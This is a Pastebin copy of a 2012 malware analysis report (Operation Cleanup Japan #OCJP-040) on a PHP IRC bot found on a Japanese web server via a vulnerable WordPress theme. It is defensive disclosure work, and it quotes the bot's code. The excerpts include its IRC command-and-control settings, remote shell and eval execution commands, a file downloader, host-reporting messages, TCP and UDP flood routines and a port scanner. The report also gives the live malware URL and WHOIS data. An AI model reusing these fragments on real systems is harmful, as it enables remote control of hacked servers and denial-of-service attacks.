Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ==============================
- Operation Cleanup Japan
- report: #OCJP-040
- Base: http://unixfreaxjp.blogspot.jp/2012/05/ocjp-040.html
- VT: https://www.virustotal.com/file/530d50212bf404cf82a40532ec90f90ea9a6533e3d38a233f8d34c15d10a0e8c/analysis/1335907672/
- ==============================
- This is the PHP IRC/Bot Malware found in Japan IDC Server w/vulnerable Wordpress theme plugin.
- Currently is under investigation under #OCJP case : OCJP-040
- Below is the proof of malicious activities of the object:
- ==================
- IRC base Bot:
- ==================
- var $config = array("server"=>"irc.s4l1ty.info",
- "port"=>6667,
- "pass"=>"zero",
- "prefix"=>"ZERO",
- "maxrand"=>8,
- "chan"=>"#zero",
- "key"=>"",
- "modes"=>"+iB-x",
- "password"=>"zero",
- "trigger"=>".",
- "hostauth"=>"*" // * for any hostname
- ==================
- DNS Lookup
- ==================
- config.inc.txt(15): * .dns <IP|HOST> //dns lookup
- config.inc.txt(206): case "dns":
- config.inc.txt(212): $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
- config.inc.txt(216): $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
- ==================
- SERVER REMOTE EXECUTION
- ==================
- Designed to execute the shell command of the unix or Windows OS if having PHP installed:
- * .sexec <cmd> // uses shell_exec() //execute a command
- * .exec <cmd> // uses exec() //execute a command
- * .cmd <cmd> // uses popen() //execute a command
- * .php <php code> // uses eval() //execute php code
- ==================
- DOWNLOADER
- ==================
- Download interface to the hacked system:
- * .download <URL> <filename> //download a file
- else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); }
- ==================
- HACKER GROUP ATTACK TOOLS
- ==================
- This tools belongs to this hacker group:
- #crew@corp. since 2003
- edited by: devil__ and MEIAFASE <admin@xdevil.org> <meiafase@pucorp.org>
- Friend: LP <fuckerboy@sercret.gov>
- ==================
- INFECTION NOTIFICATION
- ==================
- Reporting the infection to the vulnerable machine thru IRC channel:
- $this->privmsg($this->config['chan2'],"[\2uname!\2]: $uname (safe: $safemode)");
- $this->privmsg($this->config['chan2'],"[\2vuln!\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
- ==================
- DoS / DDoS ATTACK TOOLS
- ==================
- Three attack tools functions:
- TCP FLOOD
- -----------
- * .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
- case "tcpflood":
- if(count($mcmd)>5)
- {$this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);}
- function tcpflood($host,$packets,$packetsize,$port,$delay)
- {$this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]");
- $packet = "";
- for($i=0;$i<$packetsize;$i++)
- UDP FLOOD
- -----------
- * .udpflood <target> <packets> <packetsize> <delay> //udpflood attack
- function udpflood($host,$packetsize,$time) {
- $this->privmsg($this->config['chan'],"[\2Attack Iniciado com sucesso!\2]");
- $packet = "";
- for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
- $timei = time();$i = 0;
- while(time()-$timei < $time) {
- $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
- fwrite($fp,$packet);fclose($fp);$i++;
- PORT SCANNING
- -----------
- * .pscan <host> <port> //port scan
- case "pscan": // .pscan 6667
- if(count($mcmd) > 2)
- { if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
- $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
- else
- $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");
- ==================
- Portuguesel language used a lot:
- ==================
- Impossivel mandar e-mail.");
- ensagem enviada para \2"
- Nao foi possivel fazer o download. Permissao negada.
- ==================
- SPYWARE
- ==================
- Can send email messages to send infected system credential via IRC, can be used for spamming purpose:
- if(!mail($mcmd[1],"InBox Test","#crew@corp. since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \n
- {$this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send");}
- else {$this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2");}
- $this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
- $this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
- ================================
- MALWARE SOURCE
- ================================
- --14:34:56-- http://happymeme.com/uzumaki//wp-content/themes/autofocus/config.inc.txt
- => `config.inc.txt'
- Resolving happymeme.com... 112.78.112.187
- Connecting to happymeme.com|112.78.112.187|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 23,375 (23K) [text/plain]
- 100%[====================================>] 23,375 81.18K/s
- 14:34:59 (80.91 KB/s) - `config.inc.txt' saved [23375/23375]
- ================================
- VIRUS TOTAL
- ================================
- https://www.virustotal.com/file/530d50212bf404cf82a40532ec90f90ea9a6533e3d38a233f8d34c15d10a0e8c/analysis/1335907672/
- nProtect : Trojan.Dropper.RYF
- K7AntiVirus : Backdoor
- VirusBuster : PHP.Shellbot.J
- F-Prot : PHP/Pbot.B
- Symantec : PHP.Backdoor.Trojan
- Norman : PHP/Ircbot.BBPH
- TrendMicro-HouseCall : BKDR_PHPBOT.SM
- Avast : PHP:IRCBot-AB [Trj]
- ClamAV : PHP.Bot
- Kaspersky : Backdoor.PHP.Pbot.a
- BitDefender : Trojan.Dropper.RYF
- Sophos : Troj/PHPBot-F
- Comodo : Backdoor.PHP.Pbot.A
- F-Secure : Trojan.Dropper.RYF
- DrWeb : PHP.BackDoor.14
- VIPRE : Backdoor.PHP.Pbot.b (v) (not malicious)
- AntiVir : PHP/PBot.A.6
- TrendMicro : BKDR_PHPBOT.SM
- McAfee-GW-Edition : Heuristic.BehavesLike.JS.Suspicious.G
- Emsisoft : Backdoor.PHP.Pbot!IK
- eTrust-Vet : PHP/Pbot.D
- Jiangmin : Trojan/Script.Gen
- Microsoft : Trojan:PHP/Flader.A
- GData : Trojan.Dropper.RYF
- Commtouch : PHP/Pbot.B
- AhnLab-V3 : PHP/Pbot
- VBA32 : Backdoor.PHP.Pbot.a
- PCTools : Malware.PHP-Backdoor
- Rising : Trojan.Script.HTML.Agent.ab
- Ikarus : Backdoor.PHP.Pbot
- Fortinet : PHP/Pbot.AK!tr.bdr
- AVG : PHP/BackDoor.K
- Panda : Bck/Pbot.B
- ================================
- NETWORK SOURCE
- ================================
- Routing (AS)
- -----------
- IP: 112.78.112.187
- inetnum: 112.78.112.0 - 112.78.112.255
- netname: SAKURA-NET
- descr: SAKURA Internet Inc.
- country: JP
- admin-c: KT749JP
- tech-c: KW419JP
- remarks: This information has been partially mirrored by APNIC from
- remarks: JPNIC. To obtain more specific information, please use the
- remarks: JPNIC WHOIS Gateway at
- remarks: http://www.nic.ad.jp/en/db/whois/en-gateway.html or
- remarks: whois.nic.ad.jp for WHOIS client. (The WHOIS client
- remarks: defaults to Japanese output, use the /e switch for English
- remarks: output)
- changed: apnic-ftp@nic.ad.jp 20090303
- changed: apnic-ftp@nic.ad.jp 20090331
- source: JPNIC
- 112.78.112.0/20
- SAKURA-C (4/OSAKA) SAKURA Internet // WEST JAPAN BACKBONE
- 1-8-15 Kyutaro-cho, Chuo Osaka 541-0056, Japan
- AS9371
- SAKURA-C SAKURA Internet // WEST JAPAN BACKBONE
- Sakaisuji Honmachi Bldg. 9F 1-8-14 Minami-Honmachi,
- Chuo-ku Osaka 541-0054, Japan
- Domain
- -----------
- Domain Name: happymeme.com
- Created On: 2007-02-25 13:40:54.0
- Last Updated On: 2012-02-27 21:37:36.0
- Expiration Date: 2013-02-25 04:40:54.0
- Status: ACTIVE
- Registrant Name: Whois Privacy Protection Service
- Registrant Organization: paperboy and co.
- Registrant Street1: 2-7-21 Tenjin Chuo-ku
- Registrant Street2: Tenjin Prime 8F
- Registrant City: Fukuoka-shi
- Registrant State: Fukuoka
- Registrant Postal Code: 8100001
- Registrant Country: JP
- Registrant Phone: 81-927137999
- Registrant Fax: 81-927137944
- Tech Email: privacy@whoisprivacyprotection.info
- Name Server: ns1.dns.ne.jp
- Name Server: ns2.dns.ne.jp
- --------------------------------------------------
- Host names sharing IP with A records is under the
- same risk w/ the current findings (112 items)
- --------------------------------------------------
- 194964s.com
- 2103kakaku.com
- aeru21.com
- aeruzo.com
- aeruzo.net
- aitaiyoo.com
- aitaizo.com
- aitaizo.net
- anzen-shisan.com
- anzen-toushi.com
- b-jays.net
- biyo-neosta.com
- boku-uma.com
- cafebuono.net
- carnavi-neosta.com
- chanel-neosta.com
- chusho-ma.biz
- cosmo-support.com
- cucina-style.com
- cutie-eggs.com
- daftbrain.com
- dankai-club.com
- daveswebworks.com
- draxn.net
- drbeverlynelson.com
- earthworks1.com
- ed3s.net
- enyasuita.com
- extank.com
- fukuirin.com
- fx-toushi.biz
- gaika-yokin.org
- gakushi110.com
- gan-kenko.com
- gooddieter.org
- gucci-neosta.com
- hajikunshop.com
- happyguide.biz
- happyguide.info
- happymailz.com
- happymailz.net
- happymeme.com
- hlj93.com
- hpmls.net
- ichikawayuu.com
- iheya-genkimura.org
- iirufa.com
- japangoodsplaza.com
- jewelry-neosta.com
- ji-joutatsu.com
- kanakana-piano.com
- kineyakatsuroku.com
- koi-iro.com
- kojimatsubasa.com
- koshunyujob.com
- kotaninene.com
- kounojimusyo.com
- loaddarthtrader.com
- lumiere4.com
- luxy-party.com
- m2051.com
- macj-log.com
- mail.nagasaka-web.net
- mail.s-smile.net
- marujyohome.com
- mild7-1.net
- morigen.info
- morita29.com
- nagasaka-web.net
- newsharaku.com
- nibo6.com
- nitoroy.com
- npo-bsk.com
- npo-hima.net
- okamotoann.com
- onyanco.com
- oonoyohei.com
- oota-amaharashi.jp
- ozakikana.com
- penki-nurikae.com
- potyari.biz
- recorder-neosta.com
- redrox.net
- reiki-a.com
- reiki-dream.net
- rightsangyou.com
- ryuzo-nakata.com
- s-smile.net
- sakaidaiki.com
- sankei-inc.com
- sekengaku.org
- sekiaya.com
- sheadream.com
- shibataindustries.com
- shimadadaiki.com
- shisan-unyou.info
- smileagefan.com
- t-zei.jp
- ton-kichi.net
- toushi-fx.net
- uchiyamahinata.com
- www.h-sketch.com
- www.oota-amaharashi.jp
- www.penki-nurikae.com
- www.t-zei.jp
- xn--torr3dy20axh7a.com (.com)
- yamacho-club.com
- yen-energy.com
- yoke-kichijoji.com
- yokohamahikari.com
- yosapark-saribaba.com
- yurai-seitai.net
- ------
- ZeroDay Japan http://0day.jp
- OPERATION CLEANUP JAPAN | #OCJP
- Analyst: Hendrik ADRIAN アドリアン・ヘンドリック Malware Researcher VT/ twitter/google: @unixfreaxjp
- sponsored by: 株式会社ケイエルジェイテック http://www.kljtech.com
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement